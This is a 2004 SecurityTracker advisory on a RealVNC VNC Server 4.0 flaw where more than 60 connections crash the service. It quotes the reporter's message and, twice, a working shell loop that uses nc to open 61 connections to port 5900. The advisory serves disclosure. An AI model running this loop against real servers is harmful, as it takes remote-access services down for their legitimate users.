RealVNC VNC Server Can Be Crashed By Remote Users
|
|
SecurityTracker Alert ID: 1011072
|
|
SecurityTracker URL: http://securitytracker.com/id?1011072
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
|
OSVDB Reference: 9187
(Links to External Site)
|
Updated: Nov 9 2004
|
Original Entry Date: Aug 26 2004
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): 4.0 and prior versions
|
Description: A vulnerability was reported in RealVNC's VNC server. A remote user can cause the target service to crash.
Allan Zhang reported that a remote user can establish more than 60 connections to the target VNC service to cause the target service
to crash.
A demonstration exploit script is provided:
for i in `seq 1 61`
do
nc <server_ip> 5900
done
|
Impact: A remote user can cause the VNC service to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.realvnc.com/ (Links to External Site)
|
Cause: Resource error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Underlying OS Comments: Tested on Windows 2000
|
Reported By: Allan Zhang <zhangliangsd@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 25 Aug 2004 17:11:59 -0000
From: Allan Zhang <zhangliangsd@hotmail.com>
Subject: RealVNC 4.0 DoS
|
It will cause RealVNC server die if there are more than 60 connections.
Tested against RealVNC serveron W2k using the following script:
for i in `seq 1 61`
do
nc <server_ip> 5900
done
This will impact version before 4.0 also.
Thanks
Allan
|
|
